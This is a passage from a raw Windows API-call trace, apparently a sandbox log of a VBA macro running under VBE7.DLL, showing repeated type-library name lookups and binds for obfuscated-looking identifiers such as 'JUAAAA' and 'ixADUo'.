pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.809] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.809] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.809] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Y1kUXA", lHashVal=0x109f2c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.809] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.809] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.809] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Y1kUXA", lHashVal=0x109f2c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.810] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.810] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.810] IUnknown:Release (This=0x665ba50) returned 0xd [0069.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8715ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_Y1kUXA") returned 14 [0069.810] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Y1kUXA", lHashVal=0x109f2c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x58005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x58005500000000, pDummy=0x0) returned 0x0 [0069.810] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8217a | out: _Dst=0x144ec0) returned 0x0 [0069.810] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JUAAAA", lHashVal=0x1088e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JUAAAA") returned 7 [0069.810] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JUAAAA", lHashVal=0x1088e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JUAAAA") returned 7 [0069.810] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JUAAAA", lHashVal=0x1088e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.810] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUAAAA") returned 0x1088e7 [0069.810] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="JUAAAA" | out: _Dst="JUAAAA") returned 0x0 [0069.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="JUAAAA") returned 7 [0069.810] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.810] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JUAAAA", lHashVal=0x1088e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.810] IUnknown:Release (This=0x665ba50) returned 0xd [0069.810] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.810] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JUAAAA", lHashVal=0x1088e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.810] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.810] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.810] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JUAAAA", lHashVal=0x1088e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.811] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.811] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.811] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JUAAAA", lHashVal=0x1088e7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.811] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b821a2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="JUAAAA") returned 7 [0069.811] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JUAAAA", lHashVal=0x1088e7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.811] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.811] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b821a2 | out: _Dst=0x67c2d40) returned 0x0 [0069.811] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JUAAAA") returned 0x100351 [0069.811] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_JUAAAA" | out: _Dst="_B_var_JUAAAA") returned 0x0 [0069.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_JUAAAA") returned 14 [0069.811] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.811] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JUAAAA", lHashVal=0x100351, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.811] IUnknown:Release (This=0x665ba50) returned 0xd [0069.811] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.811] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JUAAAA", lHashVal=0x100351, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.811] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.811] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.811] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JUAAAA", lHashVal=0x100351, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.811] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.811] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.811] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JUAAAA", lHashVal=0x100351, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.811] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.811] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.811] IUnknown:Release (This=0x665ba50) returned 0xd [0069.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8715de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_JUAAAA") returned 14 [0069.811] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JUAAAA", lHashVal=0x100351, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.812] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b821a2 | out: _Dst=0x144ec0) returned 0x0 [0069.812] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.812] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.812] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.812] IUnknown:Release (This=0x665ba50) returned 0xd [0069.812] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.812] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.812] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.812] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.812] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.812] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.812] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.812] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.812] IUnknown:Release (This=0x665ba50) returned 0xd [0069.812] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.813] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.813] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.813] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.813] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.813] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.813] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.813] IUnknown:Release (This=0x665ba50) returned 0xd [0069.813] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.813] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.813] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.813] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.813] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.813] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.813] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.813] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.813] IUnknown:Release (This=0x665ba50) returned 0xd [0069.813] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.814] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.814] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.814] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.814] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.814] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.814] IUnknown:Release (This=0x665ba50) returned 0xd [0069.814] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.814] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.814] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.814] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.814] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.814] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.814] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.814] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.814] IUnknown:Release (This=0x665ba50) returned 0xd [0069.814] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.814] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.814] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.814] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.814] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.814] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.814] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.815] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.815] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.815] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.815] IUnknown:Release (This=0x665ba50) returned 0xd [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.815] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.815] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.815] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.815] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.815] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.815] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.815] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.815] IUnknown:Release (This=0x665ba50) returned 0xd [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.815] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixADUo") returned 7 [0069.815] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ixADUo", lHashVal=0x103ad7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixADUo") returned 7 [0069.816] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ixADUo", lHashVal=0x103ad7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixADUo") returned 7 [0069.816] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ixADUo", lHashVal=0x103ad7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ixADUo") returned 0x103ad7 [0069.816] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ixADUo" | out: _Dst="ixADUo") returned 0x0 [0069.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ixADUo") returned 7 [0069.816] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.816] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ixADUo", lHashVal=0x103ad7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.816] IUnknown:Release (This=0x665ba50) returned 0xd [0069.816] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.816] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ixADUo", lHashVal=0x103ad7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.816] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.816] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.816] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ixADUo", lHashVal=0x103ad7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.816] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.816] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.816] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ixADUo", lHashVal=0x103ad7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.816] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820fe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixADUo") returned 7 [0069.816] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ixADUo", lHashVal=0x103ad7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.816] 